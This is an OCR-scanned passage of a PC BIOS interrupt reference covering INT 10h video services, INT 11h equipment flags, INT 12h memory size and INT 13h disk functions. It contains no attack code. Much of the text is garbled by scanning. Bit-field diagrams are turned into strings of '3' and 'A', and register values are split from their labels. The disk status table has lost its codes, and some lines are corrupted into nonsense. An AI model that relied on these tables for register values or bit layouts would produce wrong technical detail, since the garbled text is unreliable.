BH = value for bit 7 
BL = 1 set color select register 
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% 


% 


% 


% 


% 


% 


AL 


AL 


on 


AL 


AL 


AL 


BX 


re 


BX 
CX 
ES 


re 


:DX 


BL 


re 


re 


O QD Il 


BH = value for color select register 


15 read DAC color register (PS/2) 
= color register to read 


turn: 

green value 
blue value 
red value 


17 read block of DAC color registers 

= first color register to read 

= number of color registers to read 

:DX = pointer to buffer for color registers 


turn: 
= pointer to color table provided as input 


18. update video DAC mask register 
= new mask 


19 read video DAC mask register 


turn: 
value read from video DAC mask register 


1A read color page state 

bit 7 of Mode Control Register 

bits 2 thru 3 of Color select register if BL 
bits © thru 3 of Color select register if BL 


turn: 
current paging mode 
current page 


1B sum color values to shades of gray 
= first color register to sum 
= number of color registers to sum 


- controls the pixel color mapping bit values 
- BIOS extension to EGA/VGA systems 


:int 10,11 
AINT 10,11 - Character Generator Routine (EGA/VGA) 


% 
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11h 


user character load 

number of bytes per character 

table in character generator RAM 
count of characters in table 
ASCII code of first character defined 
:BP = pointer to user table 


(o) 
Hd H1 © 


% AL = 01 ROM BIOS 8x14 monochrome set 
BL = table in character generator RAM 


% AL = 02 ROM BIOS 8x8 double dot 
BL = table in character generator RAM 


% AL = 03 set displayed definition table 
value for character Map Select register (EGA,VGA) 
character generator RAM table numbers (MCGA) 


% AL = 04 ROM BIOS 8x16 character set 
BL = table in character generator RAM 


% AL = 10 user specified character definition table 
BH = bytes per character (points) 
BL = table in character generator RAM 
CX = number of characters defined in table 
DX = ASCII code of first character defined 
ES:BP = pointer to user table 
% AL = 11 ROM BIOS 8x14 monochrome character set 
BL = table in character generator RAM 
% AL = 12 ROM 8x8 double dot character definitions 
BL = table in character generator RAM 
% AL = 14 ROM 8x16 double dot character definitions 
BL = table in character generator RAM 
% AL = 20 pointer to graphics character table for -INT 1F- (8x8) 
ES:BP = pointer to user table 
% AL = 21 user graphics character pointer at INT 43 
BL = row specifier 
= © - user specified (DL = rows) 
= 1 is 14 rows 
= 2 is 25 rows 
= 3 is 43 rows 
CX = bytes per character (points) 
DL = rows (when BL = 0) 
ES:BP = pointer to user table 
% AL = 22 ROM 8x14 character set 
BL = number of rows (see AL=21) 
DL = rows (when BL = 0) 
% AL = 23 ROM 8x8 double dot character set 
BL = row specifier (see AL=21) 
DL = rows (when BL = 0) 
% AL = 24 ROM 8x16 character set 
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% 


:int 10,12 


% 


% 


% 


% 


% 


BL = row specifier (see AL=21) 
DL = rows (when BL = 0) 
AL = 30 get current character generator information 
BH = information desired: 
= © -INT 1F- pointer 
= 1 INT 44h pointer 
= 2 ROM 8x14 pointer 
= 3 ROM 8x8 double dot pointer (base) 
= 4 ROM 8x8 double dot pointer (top) 
= 5 ROM 9x14 alpha alternate pointer 
= 6 ROM 8x16 character table pointer 
= 7 ROM 9x16 alternate character table pointer 
on return: 
CX = bytes per character (points) 
DL = rows (less 1) 
ES:BP = pointer to table 
AINT 10,12 - Video Subsystem Configuration (EGA/VGA) 
AH = 12h 
BL = 10 return video configuration information 
on retur 
BH = 0 if color mode in effect 
= 1 if mono mode in effect 
BL = 0 if 64k EGA memory 
= 1 if 128k EGA memory 
= 2 if 192k EGA memory 
= 3 if 256k EGA memory 
CH = feature bits 
CL = switch settings 
BL = 20 select alternate print screen routine 
BL = 30 select scan lines for alphanumeric modes 
AL = 0 200 scan lines 
= 1 350 scan lines 
= 2 400 scan lines 
on return: 
AL = 12 
BL = 31 select default palette loading 
AL = 0 enable default palette loading 
= 1 disable default palette loading 
on return: 
AL = 12 
BL = 32 CPU access to video RAM 
AL = © enable CPU access to video RAM and 1/0 ports 
= 1 disable CPU access to video RAM and 1/0 ports 
on return: 
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AL = 12 


% BL = 33 € Gray scale summing 
0 enable gray scale summing 
2 disable gray scale summing 


on return: 


% BL = 34 cursor emulation 
© enable cursor emulation 
1 disable cursor emulation 


on return: 
AL = 12 


% BL = 35 PS/2 video display switching 

O initial adapter video off 

1 initial planar video on 

2 switch active video off 

3 switch inactive video on 

ES:DX pointer to 128 byte save area (when AL = 0, 2 or 3) 


on return: 
AL = 12 
% BL = 36 video refresh control 


AL = 0 enable refresh 
= 1 disable refresh 


on return: 
AL = 12 
:int 10,13 
AINT 10,13 - Write String (BIOS versions from 1/10/86) 
AH = 13h 
AL = write mode (see bit settings below) 
= © string is chars only, attribute in BL, cursor not moved 
= 1 string is chard only, attribute in BL, cursor moved 
= 2 string contains chars and attributes, cursor not moved 
= 3 string contains chars and attributes, cursor moved 
BH = video page number 
BL = attribute if mode 0 or 1 (AL bit 1=0) 
CX = length of string (ignoring attributes) 
DH = row coordinate 
DL = column coordinate 


ES:BP = pointer to string 


Bit settings for write mode (register AL): 
37363534333231303 AL 
3 3 3 3 3 3 3 AAAAA O=don't move cursor, 1=move cursor 


3 s 3 s 3 3 AAAAAA 0=BL has attributes, 1=string has attributes 
\AARARARARARAAARA uUNuUSed 


returns nothing 
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- BEL, BS, CR, LF are treated as ASCII control codes 
- wraps data and scrolls if unable to fit data on one line 


:int 10,14 
NAINT 10,14 - Load LCD Character Font (convertible only) 


AH = 14h 


% AL = © - load user specified font 
ES:DI = pointer to character font 


CX = number of characters to store 
DX = char offset into ram font area 
BH = number of bytes per character 
BL = © load main font (block 0) 
= 1 load alternate font (block 1) 
% AL = 1 - load system ROM default font 
BL = © load main font (block 0) 
= 1 load alternate font (block 1) 
% AL = 2 - set mapping of LCD high intensity attribute 
BL = © ignore high intensity attribute 
= 1 map high intensity to underscore 
= 2 map high intensity to reverse video 
= 3 map high intensity to select alternate font 
:int 10,15 


AINT 10,15 - Return Physical Display Parms (convertible) 


AH = 15h 


on return: 
AX = alternate display adapter type 
ES:DI = pointer to parameter table: 


% Offset Size Description 


01 word monitor model number 

02. word vertical pels per meter 

03 word horizontal pels per meter 

04 word total number of vertical pels 

05 word total number of horizontal pels 

06 word horizontal pel separation in micrometers 
07 word vertical pel separation in micrometers 


:int 10,1a 
AINT 10, 1A - Video Display Combination (VGA) 


AH = 1A 
AL = 00 get video display combination 
= 01 set video display combination 

BL = active display (see table below) 

BH = inactive display 
on return: 
AL = 1A, if a valid function was requested in AH 
BL = active display (AL=00, see table below) 
BH = inactive display (AL=00) 
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% Valid display codes: 


FF. Unrecognized video system 

00 No display 

01 MDA with monochrome display 

02 CGA with color display 

03 Reserved 

04 EGA with color display 

05 EGA with monochrome display 

06 Professional graphics controller 
07 VGA with analog monochrome display 
08 VGA with analog color display 

09 Reserved 

OA MCGA with digital color display 

OB MCGA with analog monochrome display 
OC MCGA with analog color display 


- returns value at byte 40:8A indicating display combination status 
- used to detect video display capabilities 


:int 10,1b 
AINT 10,1B - Video BIOS Functionality and 
AState Information (MCGA/VGA) 


1B 
implementation type (must be zero) 
ES:DI = pointer to 64 byte buffer 


on return: 
AL = 1B 
ES:DI = pointer to updated buffer (see below) 


- returns static and dynamic information about the current 
state and capabilities of the current video system 

- bytes 0-3 of the dynamic data table at ES:DI contain a far 
pointer to the video static information table 


AVideo BIOS Dynamic Functionality State Table (MCGA/VGA) 


% Dynamic Video State Table 


00 dword address of static functionality table 
04 byte video mode 


05 word number of columns 

07 word length of displayed video buffer (# bytes) 

09 word start address of upper left corner of video buffer 
OB 16bytes cursor position table for 8 pages (col,row) 

1B byte cursor end line 

1C byte cursor start line 

1D byte active video page 


1E word 1/0 port for CRTC address register 
20 byte current value of CRTC 3x8 register 
21 byte current value of CRTC 3x9 register 


22 byte number of displayed character rows 
23. word height of character matrix (points) 
25 byte active display combination code 

26 byte inactive display combination code 

27. word number of displayed colors (mono = 0) 


29 byte number of supported video pages 
2A byte raster scan lines 0=200, 1=350, 2=400, 3=480 
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2B byte text character table used 
2C byte text character table used 
2D byte other state information: 


(CS) 


/ WWW W Wai 


ly, 


w 


NW WWW WwWoi 


3 3 AAAAA 1 = gray scale summing enabled 

3 AAAAAA 1 = monochrome display attached 

AAAAAAA 1 = default palette loading disabled 
AAAAAAAA 1 = cursor emulation enabled 
_AAAAAAAAA 1 = blinking attribute enabled 
reserved 


4 
3 3 3 3 AAAA 1 = all modes active (MCGA always 0) 
3 
3 
3 


2E 3bytes reserved 
31 byte video RAM available 0=64K, 1=128K, 2=192K, 3=256K 
32 byte save area status 


w 


/ VW WWW Wai 


pil 


w 


NW W W W Wo 
w 


534333231303 Save Area Status 

3 s 3 3 3 AAAA 1 = two text char sets are active 

3 3 3 3 AAAAA 1 = dynamic save area is active 

3 3 3 AAAAAA 1 = text char set override is active 

3 3 AAAAAAA 1 = graphics char set is override active 
3 AAAAAAAA 1 = palette override is active 

AAAAAAAAA 1 = display combination code ext. active 

= reserved 


"I 


33. dword reserved 


AVideo BIOS Static Functionality Table (EGA/VGA) 


w 


/ 0 WOW WU W Wai 


| 


3 3 3 3 AAAA 1 = mode 0 


= mode 7 


3 4 
3 3 3 3 AAAA 1 = mode 8 
3 
3 
3 


WWW WWW We 


803 Video modes supported, byte at offset 02 
AAAA 1 = mode 10 

AAAKA 1 = mode 11 

AAAAAA 1 = mode 12 

_AAAAAAA 1 = mode 13 


w 
DB 
gna 


03 dword reserved 
07 byte scan lines supported in text modes 


87363534333231303 Scan lines supported, byte at offset 07 
3 3 3 3 3 3 3 AAAA 1 = 200 lines 
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08 
09 
OA 


OB 


OC 
OE 


3 3 3 3 3 3 AAAAA 1 = 350 lines 
AAAAAAAAAAAAAAAA 1 = 400 lines 


byte max number of displayable text character sets 
byte # of text definition tables in char generator RAM 
byte other capability flags 


w 


/ GW WU W W Wai 


363534333231303 Other flags, byte at offset 0A 
3 3 3 3 3 AAAA 1 = all modes (0 on MCGA) 
3 s 3 3 AAAAA 1 = gray scale summing 
A x 
3 
3 


3 3 AAAAAA 1 = character set loading 
3 AAAAAAA 1 = default palette loading 
AAAAAAAA 1 = cursor emulation 
AAAAAAAAA 1 = 64 color palette 
AAAAAAAAAA 1 = video DAC loading 


DAC controlled by ACCS 


byte other capability flags 


37363534333231303 Other flags, byte at offset OB 

3 s 3 3 3 3 3 AAAA 1 = light pen support 

3 3 3 3 3 3 AAAAA 1 = save/restore video state 

3 3 3 3 3 AAAAAA 1 = blinking/background intensity 
3 3 3 3 AAAAAAA 1 = display combination code 


word reserved 
byte save area capabilities 


534333231303 save area capabilities at offset 0E 
3 s 3 3 3 AAAAA 1 = multiple text character sets 

3 3 3 3 AAAAAA 1 = dynamic save area 

3 3 3 AAAAAAA 1 = text character set override 

3 3 AAAAAAAA 1 = graphics character set override 

3 AAAAAAAAA 1 = palette override 

AAAAAAAAAA 1 = display combination code extension 


sint 10,1C 


OF byte reserved 

NAINT 10, 1C - Save/Restore Video State (VGA only) 
AH = 1C 
AL = 0 get save buffer size 


% 


% 


% 


CX = requested states 
bit 0: video hardware state 
bit 1: video BIOS data areas 
bit 2: video DAC state 


return 

= 1C 

= buffer size in 64 byte blocks 
= 1 save requested state 


CX = requested states (see AL = 0) 
ES:BX = pointer to buffer 


returns nothing 


AL 


= 2 restore requested states 
CX = requested states (see AL = 0) 
ES:BX = pointer to buffer 
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returns nothing 


:int 10,fe 
AINT 10,FE - Get DESQView/TopView Virtual Screen Regen Buffer 


AH = FE 
ES:DI = set to sentinel value (test for INT 10,FE supported) 


returns: 
ES:DI = address of DESQView/TopView video buffer, DI will always 
be zero 


- on return ES:DI should be tested against the original value; 
the value will change if this function is supported (DESQVIiew 
or TopView loaded), otherwise it will remain unchanged 

- if ES:DI changes this address can be used as the video screen 
regen buffer 


:int 10,ff 
NAINT 10,FF - Update DESQView/TopView Virtual Screen Regen Buffer 


= number of characters changed 
ES:DI = pointer to first character in buffer to change, ES is 
set to segment returned by -INT 10,FE- 


returns nothing 


- the physical screen does not get updated until INT 10,FF is 
called in TopView 

- it is not necessary to make this call under DESQView since it 
handles updates automatically 

- calling this function under DESQView will cancel the automatic 
update mode 


:int 11:equipment flags 
AINT 11 - BIOS Equipment Determination / BIOS Equipment Flags 


no input data 


on return: 
AX contains the following bit flags: 


w 


WU WOW WU WU W Wo dv Wo Ww IT 
w 


WWW WWW WwWwwWdi 
w 


WU WU WU W W W W ww wai 
w 


Wo VW W W WWW wi 
w 


NY VW W W Wu wdbd 
w 


WU W W W W W wW wo 
w 


WU WU W W W Ww w 0 
w 


363 


34333231303 AX 

3 3 3 3 AAAAA IPL diskette installed 

3 s AAAAAA math coprocessor 

AAAAAAAAA old PC system board RAM < 256K 
3 AAAAAA pointing device installed (PS/2) 
AAAAAAA not used on PS/2 

AAAAAAAAAA initial video mode 

AAAAAAAAAAAAA # of diskette drives, less 1 
AAAAAAAAAAAAAKA © if DMA installed 
AAAAAAAAAAAAAAAAAAA number of serial ports 
AAAAAAAAAAAAAAAAAAAKA game adapter installed 
AAAAAAAAAAAAAAAAAAAAA unused, internal modem (PS/2) 
AAAAAAAAAAAAAAAAAAAAAAAA number of printer ports 


73635 
333 
3333 
3333 
3333 
3333 
3 3 


WU WOW WU WU W W Wv W WI 
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- bits 3 & 2, system board RAM if less than 256K motherboard 


00 - 16K 01 - 32K 
10 - 16K 11 - 64K (normal) 
- bits 5 & 4, initial video mode 
00 - unused 01 - 40x25 color 
10 - 80x25 color 11 - 80x25 monochrome 
- bits 7 & 6, number of disk drives attached, when bit 0=1 
00 - 1 drive 01 - 2 drives 
10 - 3 drive 11 - 4 drives 


- returns data stored at -BIOS Data Area- location 40:10 
- some flags are not guaranteed to be correct on all machines 
- bit 13 is used on the PCjr to indicate serial printer 


sint 12 


AINT 12 - Memory Size Determination 


no input data 


on return: 


AX 


= the 


number of contiguous 1k memory blocks found at startup 


- contiguous memory does not include video memory or extended RAM 


sint 13:BIOS disk services 


NINT 13 - 


NAFor more 


INT 
INT 
INT 
INT 
INT 
INT 
INT 
INT 
INT 
INT 
INT 
INT 
INT 
INT 
INT 
INT 
INT 
INT 
INT 
INT 
INT 
INT 
INT 
INT 
INT 
INT 


Diske 
infor 


13,0- 
13,1- 
13,2- 
13,3- 
13,4- 
13,5- 
13,6- 
13,7- 
13,8- 
13,9- 
13, A- 
13,B- 
13,C- 
13,D- 
13, E- 
13,F- 

13,10- 

13, 11- 

13, 12- 

13,13- 

13, 14- 

13, 15- 

13, 16- 

13,17- 

13, 18- 

13,19- 
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tte BIOS Services 
mation see the following topics: 


Reset disk system 

Get disk status 

Read disk sectors 

Write disk sectors 

Verify disk sectors 

Format disk track 

Format track and set bad sector flag (XT & portable) 
Format the drive starting at track (XT & portable) 

Get current drive parameters (XT & newer, see note 9) 
Initialize 2 fixed disk base tables (XT & newer, see note 9) 
Read long sector (XT & newer, see note 06) 

Write long sector (XT & newer, see note 0) 

Seek to cylinder (XT & newer, see note 9) 

Alternate disk reset (XT & newer, see note 9) 

Read sector buffer (XT & portable only) 

Write sector buffer (XT & portable only) 

Test for drive ready (XT & newer, see note 0) 
Recalibrate drive (XT & newer, see note 9) 

Controller ram diagnostic (XT & portable only) 

Drive diagnostic (XT & portable only) 

Controller internal diagnostic (XT & newer, see note 9) 
Read disk type/DASD type (XT BIOS from 1/10/86 & newer) 
Disk change line status (XT BIOS from 1/10/86 & newer) 
Set dasd type for format (XT BIOS from 1/10/86 & newer) 
Set media type for format (BIOS date specific) 

Park fixed disk heads (AT & newer) 


-INT 13, 1A- Format ESDI drive unit (PS/2 50+) 


9 The 1983 version of the "IBM XT BIOS Technical Reference" 
shows these functions are available for the XT but many other 
programming references say they aren't available until the AT. 
This is probably due to misunderstanding the design of the disk 
BIOS. Upon bootup the hard disk BIOS replaces the default 
INT 13h diskette handler with the hard disk INT 18h handler. 


% Most disk BIOS calls use the following parameter scheme: 
AH = function request number 
AL = number of sectors (1-128 dec.) 
CH = cylinder number (0-1023 dec.) 
CL = sector number (1-17 dec.) 
DH = head number (0-15 dec.) 
DL = drive number (0=A:, 1=2nd floppy, 80h=drive 0, 81h=drive 1) 
DL = drive number (0=A:, 1=2nd floppy, 80h=C:, 81h=D:) 


Note that some programming references use (0-3) as the 
drive number which represents diskettes only. 
ES:BX = address of user buffer 


% and return with: 
CF O if successful 
1 if error 
status of operation (see INT 13,STATUS) 


AH 


- INT 13 diskette read functions should be retried at least 3 
times to assure the disk motor has time to spin up to speed 

- physical sector numbers can be converted to and from DOS sector 
numbers with the following formulas: 


dos_sector = (sector - 1) + (head * sectors_per_track) + 
(track * sectors_per_track * num_heads) 


physical_sector = 1 + (dos_sector MOD sectors_per_track) 
physical _head = (dos_sector / sectors_per_track) MOD num heads 
physical_track = dos_sector / (sectors_per_track * num_heads) 


- registers DS, BX, CX and DX are preserved 
- see —INT 13,STATUS- 


‘int 13,0 
AINT 13,0 - Reset Disk System 


AH = 00 

DL = drive number (0=A:, 1=2nd floppy, 80h=drive 0, 81h=drive 1) 
on return: 

AH disk operation status (see -INT 13,STATUS-) 


CF = 0 if successful 
= 1 if error 


- clears reset flag in controller and pulls heads to track 0 
- setting the controller reset flag causes the disk to recalibrate 
on the next disk operation 
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- if 
wil 
for 


bit 7 is set, the diskette drive indicated by the lower 7 bits 
1 reset then the hard disk will follow; return code in AH is 
the drive requested 


sint 13, 1:int 13, status 


NINT 13,1 - 


on re 
AL = 


% Statu 


- cod 
- ret 


‘int 13,2 
NINT 13,2 - 


m 
v 
dd 
x 


on re 
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Disk Status 


turn: 
status: 


sin AL 


no error 
bad command passed to driver 

address mark not found or bad sector 

diskette write protect error 

sector not found 

fixed disk reset failed 

diskette changed or removed 

bad fixed disk parameter table 

DMA overrun 

DMA access across 64k boundary 

bad fixed disk sector flag 

bad fixed disk cylinder 

unsupported track/invalid media 

invalid number of sectors on fixed disk format 
fixed disk controlled data address mark detected 
fixed disk DMA arbitration level out of range 
ECC/CRC error on disk read 

recoverable fixed disk data error, data fixed by ECC 
controller error (NEC for floppies) 

seek failure 

time out, drive not ready 

fixed disk drive not ready 

fixed disk undefined error 

fixed disk write fault on selected drive 

fixed disk status error/Error reg = 0 

sense operation failed 


es represent controller status after last disk operation 
urns the status byte located at 40:41 in the -BIOS Data Area- 


Read Disk Sectors 


02 

number of sectors to read (1-128 dec.) 

track/cylinder number (0-1023 dec., see below) 

sector number (1-17 dec.) 

head number (0-15 dec.) 

drive number (0=A:, 1=2nd floppy, 80h=drive 0, 81h=drive 1) 
= pointer to buffer 


turn: 

status (see -INT 13,STATUS-) 
number of sectors read 

0 if successful 

1 if error 


- BIOS disk reads should be retried at least three times and the 
controller should be reset upon error detection 

- be sure ES:BX does not cross a 64K segment boundary or a 
DMA boundary error will occur 

- many programming references list only floppy disk register values 

- only the disk number is checked for validity 

- the parameters in CX change depending on the number of cylinders; 
the track/cylinder number is a 10 bit value taken from the 2 high 
order bits of CL and the 8 bits in CH (low order 8 bits of track): 


3F3E3D3C3B3A3938373635-03 CX 

3 3 3 3 3 3 3 3 3 3° AAAAAA sector number 

3 3 3 3 3 3 3 3 AAAAAAAAKA high order 2 bits of track/cylinder 
AAAKAAAKAKAAAAAKAAAAAKKAKA low order 8 bits of track/cyl number 


- see -INT 13, A- 


‘int 13,3 
NINT 13,3 - Write Disk Sectors 
AH = 03 
AL = number of sectors to write (1-128 dec.) 
CH = track/cylinder number (0-1023 dec.) 
CL = sector number (1-17 dec., see below) 
DH = head number (0-15 dec.) 
DL = drive number (0=A:, 1=2nd floppy, 80h=drive 0, 81h=drive 1) 


ES:BX = pointer to buffer 


on return: 

O if CF=0; otherwise disk status (see -INT 13,STATUS-) 
number of sectors written 

O if successful 

1 if error 


- BIOS disk write attempts should reset the controller on error 

- be sure ES:BX does not cross a 64K segment boundary or a 
DMA boundary error will occur 

- IBM PC XT 286 does not require a value in AL, though it is 
recommended that one be supplied for portability 

- many programming references list only floppy disk register values 

- only the disk number is checked for validity 

- the parameters in CX change depending on the number of cylinders; 
the track/cylinder number is a 10 bit value taken from the 2 high 
order bits of CL and the 8 bits in CH (low order 8 bits of track): 


3F3E3D3C3B3A3938373635-03 CX 

3 3 3 3 3 3 3 3 3 3 AAAAAA sector number 

3 3 3 3 3 s 3 3 AAAAAAAAAA high order 2 bits of track/cylinder 
AAAAAAAAAAAAAAKAARAAAAAAAAA low order 8 bits of track/cyl number 


- see -INT 13,B- 


:int 13,4 
AINT 13,4 - Verify Disk Sectors 
AH = 04 
AL = number of sectors to verify (1-128 dec.) 
CH = track/cylinder number (0-1023 dec., see below) 
CL = sector number (1-17 dec.) 
DH = head number (0-15 dec.) 
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DL = drive number (0=A:, 1=2nd floppy, 80h=drive 0, 81h=drive 1) 
ES:BX = pointer to buffer 


on return: 

status (see -INT 13,STATUS-) 
number of sectors verified 

© if successful 

1 if error 


- BIOS disk reads should be retried at least three times and the 
controller should be reset upon error detection 

- causes controller to calculate the CRC of the disk data and 
compare it against the CRC stored in the sector header 

- BIOS before 11/15/85 required ES:BX point to a valid buffer 
that doesn't cross DMA boundaries. More recent BIOS versions 
actually ignore the buffer and the DMA boundary requirement 

- use this function to check for valid formatted diskette in a 
the specified drive and for drive ready for read 

- only the disk number is checked for validity 

- the parameters in CX change depending on the number of cylinders; 
the track/cylinder number is a 10 bit value taken from the 2 high 
order bits of CL and the 8 bits in CH (low order 8 bits of track): 


3F3E3D3C3B3A3938373635-03 CX 

3 3 3 3 3 3 3 3 3 3 AAAAAA sector number 

3 3 3 3 3 s 3 3 AAAAAAAAAA high order 2 bits of track/cylinder 
AAA. Lou 01der 8 bits of tpack/cyi Gimber 


- see -DETECTING- 


:int 13,5 
NINT 13,5 - Format Disk Track 
AH = 05 
AL = interleave value (XT only) 
CX = track/cylinder number (see below for format) 
DH = head number (0-15 dec.) 
DL = drive number (0=A:, 1=2nd floppy, 80h=drive 0, 81h=drive 1) 
ES:BX = pointer to block of "track address fields" containing 
four byte fields for each sector to be formatted of the form: 
1 byte track number 
1 byte head number Size # 
1 byte sector number Codes Bytes 
1 byte sector size code (0) 128 
1 256 
2 512 
3 1024 
on return: 
AH = status (see -INT 13,STATUS-) 
CF = 0 if successful 


1 if error 


- BIOS disk write attempts should reset the controller on error 

- -INT 13,17- should be called to set the DASD type 

- this function is capable of doing great damage if the parameters 
are incorrectly specified; only the drive number is checked 

- initializes disk address fields and data sectors 

- interleave is specified by ordering of track address fields 

- after INT 13 disk format, if the disk is to be used with DOS the 
DOS data structure must be written 
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- only the disk number is checked for validity 

- the parameters in CX change depending on the number of cylinders; 
the track/cylinder number is a 10 bit value taken from the 2 high 
order bits of CL and the 8 bits in CH (low order 8 bits of track): 


3F3E3D3C3B3A3938373635-03 CX (cylinder value 0-1023 dec.) 
io i VINO ci 

3 3 3 s 3 s 3 3 AAAAAAAAAA high order 2 bits of track/cylinder 
RRAAARARARARANIIIAAANEAK. ‘Low ovdet & bits of track/cyi munber 


:int 13,6 
AINT 13,6 - Format Track and Set Bad Sector Flags (XT & portable) 
AH = 06 
AL = Interleave value (XT only) 
BX = format buffer, size = 512 bytes; the first 
2*(sectors/track) bytes contain F,N for each sector 
F = 00h for good sector, 
F = 80h for bad sector 
N = sector number 
on return: 
AH status (see -INT 13,STATUS-) 


CF = 0 if successful 
= 1 if error 


- BIOS disk write attempts should reset the controller on error 
- only the disk number is checked for validity 

‘int 13,7 

NAINT 13,7 - Format Drive Starting at Specified Track (XT & portable) 


AH = 07 
AL = interleave value (XT only) 
BX = format buffer, size = 512 bytes; the first 2*(sectors/track) 
bytes contain F, N for each sector where: 
F = 00h for good sector 
F = 80h for bad sector 
N = sector number 
on return: 
AH status (see -INT 13,STATUS-) 


CF = 0 if successful 
= 1 if error 


- BIOS disk write attempts should reset the controller on error 
- only the disk number is checked for validity 

‘int 13,8 

AINT 13,8 - Get Current Drive Parameters (XT & newer) 


AH = 08 
DL = drive number (0=A:, 1=2nd floppy, 80h=drive 0, 81h=drive 1) 
on return: 


AH = status (see -INT 13,STATUS-) 
BL = CMOS drive type 
01 - 5- 360K 03 - 3« 720K 
02 - 5- 1.2Mb 04 - 3« 1.44Mb 
CH = cylinders (0-1023 dec. see below) 
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CL = sectors per track (see below) 
DH = number of sides (0 based) 
DL = number of drives attached 
ES:DI = pointer to 11 byte —-Disk Base Table- (DBT) 
CF = 0 if successful 
= 1 if error 
% Cylinder and Sectors Per Track Format 


3F3E3D3C3B3A393837363534333231303 CX 


3 33 3 3 
3 33 3 3 


3 s 3 3 AAAAAAAAAAAAA sectors per track 
3 3 AAAAAAAAAAAAA high order 2 bits of cylinder count 


AAAAAAAAAAAAAKAAAAAAAAAAA low order 8 bits of cylinder count 


- the track/cylinder number is a 10 bit value taken from the 2 high 
order bits of CL and the 8 bits in CH (low order 8 bits of track) 
- many good programming references indicate this function is only 
available on the AT, PS/2 and later systems, but all hard disk 
systems since the XT have this function available 
- only the disk number is checked for validity 


:int 13,9 


AINT 13,9 - Initialize Fixed Disk Table (XT & newer) 


AH = 09 

DL = 

on return: 
AH status 


fixed disk number (80h=drive 0, 81h=drive 1) 


(see -INT 13, STATUS-) 


CF = 0 if successful 


1 if error 


- sets specified fixed disk table to the default values from ROM 
- many good programming references indicate this function is only 
available on the AT, PS/2 and later systems, but all hard disk 

systems since the XT have this function available 
- INT 41h vector is pointer to table for drive 0 
- INT 46h vector is pointer to table for drive 1 


ATable definitions located by interrupt vectors 41H & 46H 
% Offset Size Description 

00 word maximum number of cylinders 

02 byte maximum number of heads 

03 word starting reduced write current cylinder 

05 word starting write pre-comp cylinder 

07 byte maximum ECC data burst length 

08 byte control byte: 


37363534333231303 Control byte 

3 3 3 3 3 AAAAAAAAA drive option 

3 3 AAAAAAAAAAAAAA always zero 

3 AAAAAAAAAAAAAAA disable ECC retries 
AAAAAAAAAAAAAAAA disable access retires 


:int 13,a 


NAINT 13,A - Read Long Sector (XT & newer) 
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AL = number of sectors (1-121 dec.) 

CH = track number (0-1023 dec., see below) 

CL = sector number (1-17 dec., see below) 

DH = head number (0-15 dec.) 

DL = fixed drive number (80h=drive 0, 81h=drive 1) 
ES:BX = address of buffer 

on return: 

AH = status (see -INT 13,STATUS-) 

AL = number of sectors actually transferred 

CF = 0 if successful 


1 if error 


- BIOS disk reads should be retried at least three times and the 
controller should be reset upon error detection 

- many good programming references indicate this function is only 
available on the AT, PS/2 and later systems, but all hard disk 
systems since the XT have this function available 

- reads regular data sectors (128-1024 bytes) with an additional 
4 byte ECC code included 

- a DMA boundary error will occur if the buffer at ES:BX crosses 
a 64K segment boundary 

- only the disk number is checked for validity 

- the parameters in CX change depending on the number of cylinders; 
the track/cylinder number is a 10 bit value taken from the 2 high 
order bits of CL and the 8 bits in CH (low order 8 bits of track): 


3F3E3D3C3B3A393837363534333231303 CX 
SORIA Shea 

3 3 3 3 3 3 3 3 AAAAAAAAAAAAAKA high order 2 bits of track number 
NIE SEDE O Ro RE Ra Te e 


- see -INT 13,2- 


:int 13,b 

AINT 13,B - Write Long Sectors (XT & newer) 
AH = OB 
AL = number of sectors (1-121 dec.) 
CH = track number (0-1023 dec., see below) 
CL = sector number (1-17 dec., see below) 
DH = head number (0-15 dec.) 
DL = fixed drive number (80h=drive 0, 81h=drive 1) 
ES:BX = address of buffer 
on return: 
AL = number of sectors actually transferred 
AH = status (see -INT 13,STATUS-) 
CF = 0 if successful 


1 if error 


- BIOS disk write attempts should reset the controller on error 

- many good programming references indicate this function is only 
available on the AT, PS/2 and later systems, but all hard disk 
systems since the XT have this function available 

- writes regular sectors (128-1024 bytes) with additional 4 byte 
ECC code included in data 

- a DMA boundary error will occur if the buffer at ES:BX crosses 
a 64K segment boundary 
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- only the disk number is checked for validity 

- the parameters in CX change depending on the number of cylinders; 
the track/cylinder number is a 10 bit value taken from the 2 high 
order bits of CL and the 8 bits in CH (low order 8 bits of track): 


3F3E3D3C3B3A393837363534333231303 CX 

33 3 3 3 3 3 3 3 3 AAAAAAAAAAAAALA sector number 

3 3 3 3 3 s 3 3 AAAAAAAAAAAAAAKA high order 2 bits of track number 
AAAAAARAAAAAAARAAAAAAAAAAALA low order 8 bits of track number 


- see -INT 13,3- 


sint 13,C 

NAINT 13,C - Seek to Cylinder (XT & newer) 
AH = OC 
CH = low order byte of cylinder number (see below) 
CL = high order byte of cylinder number (see below) 
DH = head number (0-15) 
DL = fixed drive number (80h=drive 0, 81h=drive 1) 
on return: 
AH status (see -INT 13,STATUS-) 


CF = 0 if successful 
= 1 if error 


- many good programming references indicate this function is only 
available on the AT, PS/2 and later systems, but all hard disk 
systems since the XT have this function available 

- notice that CX is in reverse byte format similar to the way data 
is stored in memory and reverse of normal register storage 

- only the disk number is checked for validity 

- the parameters in CX change depending on the number of cylinders; 
the track/cylinder number is a 10 bit value taken from the 2 high 
order bits of CL and the 8 bits in CH (low order 8 bits of track): 


3F3E3D3C3B3A3938373635-03 CX 
3 3 3 3 3 3 3 3 3 3 ÀAAAAA unused 
3 3 3 3 3 s 3 3 AAAAAAAAAA high order 2 bits of track number 
AAAAAAAAAAAAAAAAAAAAAAAAA low order 8 bits of track number 
:int 13,d 
AINT 13,D - Alternate Disk Reset (XT & newer) 


AH = OD 

DL = fixed drive number (80h=drive 0, 81h=drive 1) 
on return: 

AH status (see -INT 13,STATUS-) 


CF = 0 if successful 
= 1 if error 


- many good programming references indicate this function is only 
available on the AT, PS/2 and later systems, but all hard disk 
systems since the XT have this function available 

- used to force drive recalibration similar to -INT 13, 0- 
drive heads are positioned at track zero 

sint 13, e 
NAINT 13,E - Read Sector Buffer (XT & portable only) 
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AH 


:int 13, 
NINT 13, 


AH 


‘int 13, 
NINT 13, 


:int 13, 
NINT 13, 


:int 13, 
NINT 13, 


AH 


on 


= OE 

return: 

= number of sectors actually transferred 
= status (see -INT 13,STATUS-) 

= 0 if successful 

= 1 if error 

f 

F - Write Sector Buffer (XT & portable only) 
= OF 

return: 

= number of sectors actually transferred 
= status (see -INT 13,STATUS-) 

= 0 if successful 

= 1 if error 
10 
10 - Test for Drive Ready (XT & newer) 

= 10h 

